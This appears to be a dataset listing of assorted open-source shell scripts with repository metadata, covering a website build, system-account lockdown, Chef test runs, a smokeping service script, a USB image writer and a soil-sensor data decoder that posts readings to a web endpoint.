python3 ${CWD_DIR}/../../scripts/python/voice_build.py -s /voices/${userid}_cy/data -v ${userid}_cy -l cy
| true
|
2a398a838b8728711723d49fe17a5228e64d377a
|
Shell
|
syncthing/website
|
/build.sh
|
UTF-8
| 418
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
set -euo pipefail
mkdir -p functions
pushd functions-src
for d in * ; do
pushd "$d"
go build -o "../../functions/$d"
popd
done
popd
pushd script
go run . > ../themes/default/layouts/partials/github-sponsors.html
popd
rel=$(curl -s https://api.github.com/repos/syncthing/syncthing/releases/latest \
| grep tag_name \
| awk '{print $2}' \
| tr -d \",v)
echo "stable: $rel" > data/release.yaml
hugo
| true
|
1ada9c994c86b7566c61eb5ceb64a685fc1bc7d0
|
Shell
|
mrdnewman/bash
|
/lck_SysAccts.sh
|
UTF-8
| 392
| 3.109375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# -- Lock down system accounts ...
# -- lksysacct.sh
SCRIPT_NAME=`basename $0`;
for user in `awk -F: '($3 < 500) {print $1 }' /etc/passwd`; do
if [ $user != "root" ]; then
/usr/sbin/usermod -L $user
fi
if [ $user != "sync" ] && [ $user != "shutdown" ] && [ $user != "halt" ]; then
/usr/sbin/usermod -s /sbin/nologin $user
fi
done
| true
|
f12f45dc8209127407937846b44ef7c432872c32
|
Shell
|
dmlb2000/torque-cookbook
|
/test.sh
|
UTF-8
| 715
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash -x
DIST=${1:-centos-72}
berks install
rm -rf test/integration/playground/cookbooks/*
berks vendor test/integration/playground/cookbooks
pushd test/integration/playground
knife upload --server-url http://192.168.121.1:8889 cookbooks data_bags environments roles
popd
for i in 0 1 ; do
echo "sudo chef-client -r 'role[torque-server],recipe[torque::server]'" | kitchen login server-$DIST
echo "sudo chef-client -r 'role[torque-clients],recipe[torque::client]'" | kitchen login client-$DIST
echo "sudo chef-client -r 'role[torque-compute],recipe[torque::compute]'" | kitchen login c0-$DIST
echo "sudo chef-client -r 'role[torque-compute],recipe[torque::compute]'" | kitchen login c1-$DIST
done
| true
|
3b7647044078cdcf96c47c21b688cf064b06e536
|
Shell
|
ii-lo/pelp
|
/install-ruby.sh
|
UTF-8
| 227
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
source /home/vagrant/.rvm/scripts/rvm # changed, used to be /usr/local/rvm/scripts/rvm
rvm use --default --install $1 # changed, used to not set --default
shift
if (( $# ))
then gem install $@
fi
| true
|
4e7eaca030f4a43a77b336007d94f2a26965a48c
|
Shell
|
gman999/bitrig-ports
|
/net/smokeping/pkg/smokeping_fcgi.rc
|
UTF-8
| 406
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/sh
#
# $OpenBSD: smokeping_fcgi.rc,v 1.1 2014/11/05 15:42:09 sthen Exp $
daemon="${TRUEPREFIX}/bin/smokeping_cgi"
daemon_flags="${SYSCONFDIR}/config"
. /etc/rc.d/rc.subr
pexp="/usr/bin/perl ${daemon}${daemon_flags:+ ${daemon_flags}}"
rc_reload=NO
rc_start() {
${LOCALBASE}/bin/spawn-fcgi -s /var/www/run/smokeping.sock \
-u _smokeping -U www -M 0660 ${daemon} ${daemon_flags}
}
rc_cmd $1
| true
|
94d73c27e5e0296be6e2dfdd5f80450a7e797544
|
Shell
|
hanwei7788/LM-auto
|
/automatedtesting/linkmotion-dev-tools/hardware-setup/write_usb_image.sh
|
UTF-8
| 1,123
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/bash
# params:
# - image file <for example imx6-nightly-20150514-0112.ext4fs.xz>
# - usb device <for example /dev/sdc>
IMAGE_FILE=$1
USB_DEVICE=$2
if [ ! -f "$IMAGE_FILE" ]; then
echo "Image file $IMAGE_FILE doesn't exist!"
exit 1
fi
if [ ! -b "$USB_DEVICE" ]; then
echo "Device file $USB_DEVICE doesn't exist!"
exit 1
fi
if [ ! -f /usr/bin/pv ]; then
echo "Please install pv - sudo apt-get install pv"
exit 1
fi
PARTITION=${USB_DEVICE}2
if [ ! -b "$PARTITION" ]; then
echo "Partition $USB_DEVICE doesn't exist!"
exit 1
fi
echo "Going to write $IMAGE_FILE to partition $PARTITION."
echo
echo "Info on the disk, check that it's the correct one:"
echo
udevadm info -n $USB_DEVICE |grep ID_MODEL=
lsblk -f $USB_DEVICE
echo
echo "Press enter to continue, ctrl-C to cancel.."
read
echo "Writing, stand by.."
cat $IMAGE_FILE | xz -d | pv -s 700m | sudo dd of=$PARTITION bs=1M
echo "Checking partition.."
sudo fsck -f $PARTITION
echo "Resizing partition.."
sudo resize2fs $PARTITION
sync
echo
echo "Image written to $PARTITION. You may now remove the device. It's synced already."
| true
|
4c0a94ce63bfd5fe0ba2366e7b29ce80dceb2479
|
Shell
|
dhinilkv956/Libelium
|
/waspmote/Lorawan/soil_monitor data extraction
|
UTF-8
| 2,016
| 2.59375
| 3
|
[] |
no_license
|
#!/bin/bash
tail -n 10 /tmp/dhinil | grep '"deveui":"30-52-bc-32-c8-91-3e-88"' | tail -n 1 > /tmp/30-52-bc-32-c8-91-3e-88_new.txt
diff /tmp/30-52-bc-32-c8-91-3e-88_new.txt /tmp/30-52-bc-32-c8-91-3e-88.txt
result=`echo $?`
cp /tmp/30-52-bc-32-c8-91-3e-88_new.txt /tmp/30-52-bc-32-c8-91-3e-88.txt
data64=`tail -n 1 /tmp/30-52-bc-32-c8-91-3e-88.txt | sed -n -e 's/^.*data":"//p' | cut -f1 -d"," | sed '$s/.$//'`
datahex=`echo "$data64" | base64 -d | hexdump -v -e '/1 "%02x" '`
dphex0=`echo $datahex | cut -c11-18`
echex0=`echo $datahex | cut -c21-28`
sthex0=`echo $datahex | cut -c31-38`
batthex0=`echo $datahex | cut -c7-8`
dphex1=`echo "$dphex0" | sed 's/.\{2\}/&\x/g' | sed 's/^/x/' | sed '$s/.$//' | sed 's#x#/x#g' | tr '/' '\'`
echex1=`echo "$echex0" | sed 's/.\{2\}/&\x/g' | sed 's/^/x/' | sed '$s/.$//' | sed 's#x#/x#g' | tr '/' '\'`
sthex1=`echo "$sthex0" | sed 's/.\{2\}/&\x/g' | sed 's/^/x/' | sed '$s/.$//' | sed 's#x#/x#g' | tr '/' '\'`
dp=`echo -ne "$dphex1" | hexdump -e '1/4 "%f" "\n"'`
ec=`echo -ne "$echex1" | hexdump -e '1/4 "%f" "\n"'`
st=`echo -ne "$sthex1" | hexdump -e '1/4 "%f" "\n"'`
batt=`echo $((16#$batthex0))`
first=`awk -v "a=$dp" 'BEGIN { print 0.0000043 * a * a * a }'`
second=`awk -v "b=$dp" 'BEGIN{print 0.00055 * b * b }'`
third=`awk -v "c=$dp" 'BEGIN{print 0.0292 * c }'`
plus=`awk -v "d=$first" -v "e=$third" 'BEGIN { print d + e }'`
minus=`awk -v "f=$second" 'BEGIN { print f + 0.053 }'`
final=`awk -v "g=$plus" -v "h=$minus" 'BEGIN { print g - h }'`
VWC=`awk -v "i=$final" 'BEGIN { print i * 100 }'`
if [[ $dp =~ ^[+-]?[0-9]+\.?[0-9]*$ || $dp =~ ^[+-]?[0-9]+$ ]] && [[ $ec =~ ^[+-]?[0-9]+\.?[0-9]*$ || $ec =~ ^[+-]?[0-9]+$ ]] && [[ $st =~ ^[+-]?[0-9]+\.?[0-9]*$ || $st =~ ^[+-]?[0-9]+$ ]] && [[ $VWC =~ ^[+-]?[0-9]+\.?[0-9]*$ || $VWC =~ ^[+-]?[0-9]+$ ]] && [[ $result == 1 ]];then
curl -X POST 'http://relay2.saturnmellc.com/soil/data.php?dp='$dp'&ec='$ec'&st='$st'&batt='$batt'&VWC='$VWC''
else
echo $(date) $dp $ec $st $VWC >> /tmp/nonumber.txt
fi
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.